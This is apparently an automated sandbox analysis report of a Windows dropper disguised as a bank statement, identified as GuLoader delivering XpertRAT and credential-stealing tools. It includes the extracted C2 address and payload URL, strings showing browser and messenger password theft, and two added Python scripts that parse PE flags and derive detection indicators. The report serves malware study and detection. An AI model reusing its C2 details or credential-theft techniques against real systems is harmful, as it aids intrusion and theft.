Windows Analysis Report: Statement from QNB.exe

Overview

General Information

Sample Name: Statement from QNB.exe
Analysis ID: 527846
MD5: 9c8b626668e14aeb4355ea39d1520e33
SHA1: 554069b1fb3a80a02840158d31c6c2826812cb40
SHA256: d63ed0450efe28d525954d84556394f21df1c2d882e74b4891492fefab00dd79

Detection

GuLoader MailPassView XpertRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Yara detected MailPassView
Yara detected XpertRAT
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Writes to foreign memory regions
Tries to detect Any.run
Yara detected VB6 Downloader Generic
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Disables user account control notifications
Tries to steal Mail credentials (via file registry)
Changes security center settings (notifications, updates, antivirus, firewall)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected WebBrowserPassView password recovery tool
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Disables UAC (registry)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1y{\\"}
Source: 12.0.iexplore.exe.400000.3.unpack Malware Configuration Extractor: XpertRAT {"C2 list": ["z1s.us.to:5344"], "Mutex": "D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4", "Group": "Test", "Name": "Xpert", "Version": "3.0.10", "Password": "root"}
Antivirus or Machine Learning detection for unpacked file
Source: 12.0.iexplore.exe.400000.3.unpack Avira: Label: TR/Dropper.Gen
Source: 12.0.iexplore.exe.400000.2.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.iexplore.exe.400000.1.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 12.2.iexplore.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 12.0.iexplore.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.iexplore.exe.400000.2.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 12.0.iexplore.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 12.0.iexplore.exe.400000.4.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.iexplore.exe.400000.0.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 16.0.iexplore.exe.400000.3.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 16.0.iexplore.exe.400000.4.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 16.0.iexplore.exe.400000.5.unpack Avira: Label: SPR/Tool.MailPassView.473

Compliance:

Uses 32bit PE files
Source: Statement from QNB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49835 version: TLS 1.2
Source: Binary string: z:\Projects\VS2005\mspass\Release\mspass.pdb source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: iexplore.exe, iexplore.exe, 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\Dialupass\Release\Dialupass.pdb source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp
Source: Binary string: .pdba source: iexplore.exe, 0000000C.00000003.81100972595.0000000005EA1000.00000004.00000001.sdmp
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00406EC3
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen, 17_2_00408752
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_004080D9 FindFirstFileW,FindNextFileW,FindClose, 17_2_004080D9
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 18_2_0040423A FindFirstFileA,FindNextFileA, 18_2_0040423A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 20_2_0040537B FindFirstFileW,FindNextFileW,wcslen,wcslen, 20_2_0040537B
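The Characteristics flags quoted in the "Uses 32bit PE files" finding come straight from the COFF file header. The script below is an added example, not part of the Joe Sandbox report: it decodes those bits from raw header bytes, reads the optional header's DllCharacteristics for the ASLR/DEP/CFG opt-ins, and states the consequence of RELOCS_STRIPPED that matters to a defender: an image without a relocation table cannot be rebased, so ASLR can never apply to it whatever DYNAMIC_BASE says. The header bytes built in the block are constructed to carry exactly the five flags the report lists and nothing else; the command-line file argument is an assumed usage, not something the report describes.

```python
import struct
import sys

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h IMAGE_FILE_*)
COFF_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits that control exploit mitigations
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",  # ASLR opt-in
    0x0100: "NX_COMPAT",     # DEP opt-in
    0x4000: "GUARD_CF",      # Control Flow Guard
}


def parse_pe_headers(data: bytes) -> dict:
    """Decode the COFF file header and, when present, DllCharacteristics from the optional header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _ts, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    info = {
        "machine": machine,
        "sections": nsections,
        "characteristics": [n for bit, n in COFF_CHARACTERISTICS.items() if chars & bit],
        "dll_characteristics": [],
    }
    opt = coff + 20
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+
    if opt_size >= 72:
        dllchars = struct.unpack_from("<H", data, opt + 70)[0]
        info["dll_characteristics"] = [n for bit, n in DLL_CHARACTERISTICS.items() if dllchars & bit]
    return info


def aslr_assessment(info: dict) -> str:
    """RELOCS_STRIPPED overrides DYNAMIC_BASE: without a relocation table the loader cannot move the image."""
    if "RELOCS_STRIPPED" in info["characteristics"]:
        return "no ASLR possible: relocation table stripped"
    if "DYNAMIC_BASE" in info["dll_characteristics"]:
        return "ASLR enabled"
    return "ASLR not opted in: relocatable but DYNAMIC_BASE unset"


def build_sample_header(characteristics: int, dll_characteristics: int) -> bytes:
    """Constructed minimal PE32 header, just enough for the parser; not a loadable executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x014C, 3, 0, 0, 0, 224, characteristics)  # 0x14C = IMAGE_FILE_MACHINE_I386
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# The five flags the report lists for Statement from QNB.exe, and no others
REPORT_FLAGS = 0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0100
SAMPLE = build_sample_header(REPORT_FLAGS, 0x0000)

if __name__ == "__main__":
    # assumed usage: python pe_flags.py <file>; falls back to the constructed header
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    parsed = parse_pe_headers(blob)
    print(parsed)
    print(aslr_assessment(parsed))
```

A hardened build would show DYNAMIC_BASE and NX_COMPAT in dll_characteristics and no RELOCS_STRIPPED; the sample here reports that ASLR is impossible, which is worth recording alongside the injection findings because the injected payloads in this report are mapped at the fixed address 0x400000 in every iexplore.exe host.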

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1y{\
Source: Malware configuration extractor URLs: z1s.us.to:5344
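Turning the extracted XpertRAT configuration into something a detection engineer can run, as an added example that is not part of the Joe Sandbox report: the Mutex string reappears on this page as the name of a dropped executable (D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe), and although it is GUID-shaped it contains letters outside the hexadecimal alphabet, which a genuine GUID never does. The script derives indicators from the configuration, flags process images whose base name has that shape, and matches flows against the configured C2 port. The process records and their paths are constructed; the two flows are taken from the report. Treating 194.85.248.156:5344 as the resolution of z1s.us.to is an assumption based only on the matching port, since the report does not show the DNS answer.

```python
import ntpath
import re

# XpertRAT configuration exactly as the report's malware configuration extractor printed it
XPERTRAT_CONFIG = {
    "C2 list": ["z1s.us.to:5344"],
    "Mutex": "D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4",
    "Group": "Test",
    "Name": "Xpert",
    "Version": "3.0.10",
    "Password": "root",
}

GUID_SHAPE = re.compile(r"^([0-9A-Z]{8})-([0-9A-Z]{4})-([0-9A-Z]{4})-([0-9A-Z]{4})-([0-9A-Z]{12})$")
HEX_ONLY = re.compile(r"^[0-9A-F]+$")


def guid_shaped_but_not_hex(name: str) -> bool:
    """True for tokens shaped like a GUID (8-4-4-4-12) that use letters beyond A-F.
    A real GUID is hexadecimal, so this shape is a cheap tell for XpertRAT-style mutex names.
    A trailing .exe is ignored so the same test works on file names."""
    base = name[:-4] if name.lower().endswith(".exe") else name
    m = GUID_SHAPE.match(base.upper())
    return bool(m) and not HEX_ONLY.match("".join(m.groups()))


def iocs_from_config(cfg: dict) -> dict:
    """Derive hunt-ready indicators from the extracted configuration."""
    c2 = []
    for entry in cfg["C2 list"]:
        host, _, port = entry.rpartition(":")
        c2.append({"host": host, "port": int(port)})
    return {
        "c2": c2,
        "mutex": cfg["Mutex"],
        # the report shows the mutex string reused as the dropped executable's name
        "dropped_exe": cfg["Mutex"] + ".exe",
    }


def flag_process_events(events: list) -> list:
    """Return Image paths whose base name is GUID-shaped but not hexadecimal."""
    return [e["Image"] for e in events if guid_shaped_but_not_hex(ntpath.basename(e["Image"]))]


def flag_flows(flows: list, iocs: dict) -> list:
    """Return flows whose destination port matches a configured C2 port."""
    c2_ports = {c["port"] for c in iocs["c2"]}
    return [f for f in flows if f["dport"] in c2_ports]


# Constructed process-creation records in the shape of Sysmon event 1 fields (paths are invented)
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe",
     "ParentImage": r"C:\Users\user\Desktop\Statement from QNB.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    # hexadecimal-only GUID as a file name: must not be flagged
    {"Image": r"C:\ProgramData\3F2504E0-4F89-11D3-9A0C-0305E82C3301.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Both flows appear in the report: the non-standard-port C2 connection and one of the Google TLS sessions
SAMPLE_FLOWS = [
    {"src": "192.168.11.20", "sport": 49806, "dst": "194.85.248.156", "dport": 5344},
    {"src": "192.168.11.20", "sport": 49804, "dst": "142.250.185.78", "dport": 443},
]

if __name__ == "__main__":
    iocs = iocs_from_config(XPERTRAT_CONFIG)
    print(iocs)
    print(flag_process_events(SAMPLE_EVENTS))
    print(flag_flows(SAMPLE_FLOWS, iocs))
```

The name heuristic is deliberately narrow: it fires on the 8-4-4-4-12 shape with non-hex letters, so legitimate GUID-named installers pass, while any sample using the same mutex-to-filename habit is caught even when the C2 host changes.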
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DATACENTERRO DATACENTERRO
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49806 -> 194.85.248.156:5344
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: iexplore.exe, 00000011.00000003.81166493558.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166329896.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81171103182.000000000387B000.00000004.00000001.sdmp String found in binary or memory: amingoverlay:///ms-gamingoverlay://kglcheck/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logint equals www.facebook.com (Facebook)
Source: iexplore.exe, 00000011.00000003.81166493558.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166329896.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81171103182.000000000387B000.00000004.00000001.sdmp String found in binary or memory: amingoverlay:///ms-gamingoverlay://kglcheck/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logint equals www.yahoo.com (Yahoo)
Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: iexplore.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhvD2BB.tmp.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: Statement from QNB.exe, 00000004.00000003.80970084976.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018482063.000000000088D000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000003.80966375673.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961766607.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961024720.000000000088D000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: Statement from QNB.exe, 00000004.00000003.80970084976.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018482063.000000000088D000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000003.80966375673.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961766607.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961024720.000000000088D000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bhvD2BB.tmp.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvD2BB.tmp.17.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: bhvD2BB.tmp.17.dr String found in binary or memory: http://ocsp.digicert.com0
Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.ebuddy.com
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmp String found in binary or memory: http://www.imvu.com
Source: iexplore.exe, 0000000E.00000002.81115436732.00000000007C9000.00000004.00000001.sdmp String found in binary or memory: http://www.imvu.com/
Source: iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmp String found in binary or memory: http://www.imvu.comata
Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.imvu.comr
Source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: Statement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
Source: Statement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/
Source: Statement from QNB.exe, 00000004.00000002.81018352703.000000000087F000.00000004.00000020.sdmp String found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/%%doc-00-5k-docs.googleusercontent.com
Source: Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018228293.0000000000871000.00000004.00000020.sdmp String found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
